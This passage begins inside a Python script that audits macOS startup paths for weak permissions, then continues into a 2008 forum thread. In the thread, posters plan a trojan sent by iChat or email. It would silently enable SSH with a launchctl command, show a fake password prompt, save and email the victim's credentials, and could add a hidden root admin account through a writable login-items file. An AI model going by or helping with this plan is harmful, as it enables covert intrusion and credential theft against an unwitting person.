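        'mode': oct(stat.S_IMODE(mode)),
        'group_writable': group_w,
        'world_writable': world_w,
        'writable_by_me': os.access(path, os.W_OK),   # callmenames' own check
        'weak': group_w or world_w or bad_owner,
    }


def audit(root, relpaths=PERSISTENCE_PATHS, expect_owner=None):
    """Findings for every path under root that exists."""
    findings = (inspect_path(os.path.join(root, rel), expect_owner) for rel in relpaths)
    return [f for f in findings if f is not None]


def weak_paths(root, relpaths=PERSISTENCE_PATHS, expect_owner=None):
    """Just the paths an audit would flag."""
    return [f['path'] for f in audit(root, relpaths, expect_owner) if f['weak']]


def build_fixture(root):
    """Constructed layout with two weak entries and two sane ones."""
    def make_file(rel, mode):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w') as fh:
            fh.write('<plist version="1.0"><dict/></plist>\n')
        os.chmod(path, mode)

    def make_dir(rel, mode):
        path = os.path.join(root, rel)
        os.makedirs(path, exist_ok=True)
        os.chmod(path, mode)

    make_file(PERSISTENCE_PATHS[0], 0o666)   # world-writable login items: weak
    make_dir(PERSISTENCE_PATHS[1], 0o777)    # anyone can drop a StartupItem: weak
    make_dir(PERSISTENCE_PATHS[2], 0o755)    # root-only writable: fine
    make_file(PERSISTENCE_PATHS[3], 0o644)   # root-only writable: fine


def run_demo():
    """Build the fixture and return the flagged paths relative to the fixture root."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return [os.path.relpath(p, root) for p in weak_paths(root)]


if __name__ == '__main__':
    print('weak:', run_demo())
```

Note that os.access() answers "can I write this now", which is the question the thread asks, while the mode bits answer "who else could": a file owned by the user with mode 644 passes the second test and fails the first, and that is the case where a login item would still run as root from a file any admin can edit.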
callmenames
May 24 2008, 03:43 PM
Incidentally, launchctl only applies to 10.4 and 10.5. For 10.3 and prior the setting is in /etc/hostconfig and is either "SSHSERVER=-YES-" or "SSHSERVER=-NO-"
lokin
May 25 2008, 02:52 PM
That was my original idea.
Because making it run on startup wouldn't give me the password, and so I wouldn't be able to ssh to the computer.
oktane
What I want to happen is to send something through ichat or email and once the receiver opens it it would either...
1) copy itself to systemloginitems and turn on remote login next time they reboot, but the problem is that I won't have their password.
2) make "launchctl load -w /System/Library/LaunchDaemons/ssh.plist" a command and then once it's installed have a simple pop down box that asks for the password and stores the password in a .txt file somewhere in their system and then when "sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist" goes it can call on that txt file for the password.
Thats all I'm shooting for right now but then it would also be nice for their computer to forward that txt file with the password.
P.S. Everything I will be doing is on either a 10.4 or 10.5 system.
callmenames
May 25 2008, 02:57 PM
Are you saying that you have no access, at all, to the computer?
If you are able to write to com.apple.SystemLoginItems.plist you can run pretty much anything, as root, with no password needed. For instance, you can create your own hidden admin user account and use that with SSH.
lokin
May 25 2008, 09:22 PM
Ya chances are I won't ever have physical access to the computer.
callmenames
May 25 2008, 10:07 PM
Sigh. So then your actual question is either how to gain sufficient control over the remote computer to be able to enable SSH -or- how to cause the user to unwittingly enable SSH...
Is the user an absolute moron with admin privileges on the system by any chance?
Oktane
May 25 2008, 10:46 PM
It would be nice if the trojan emailed you the targets:
1. IP-Address
2. Username
3. Password
4. OS and vulnerable services
Then either install a SSH program or enable the default
callmenames
May 25 2008, 11:12 PM
No point even discussing that part until the big mystery of how you are going to get anything to occur on the remote computer is solved, don't ya think?
lokin
May 26 2008, 02:55 AM
QUOTE
Is the user an absolute moron with admin privileges on the system by any chance?
Why yes he is!
And honestly the answer to the big problem may be as simple as making a GUI that will save his login name and password.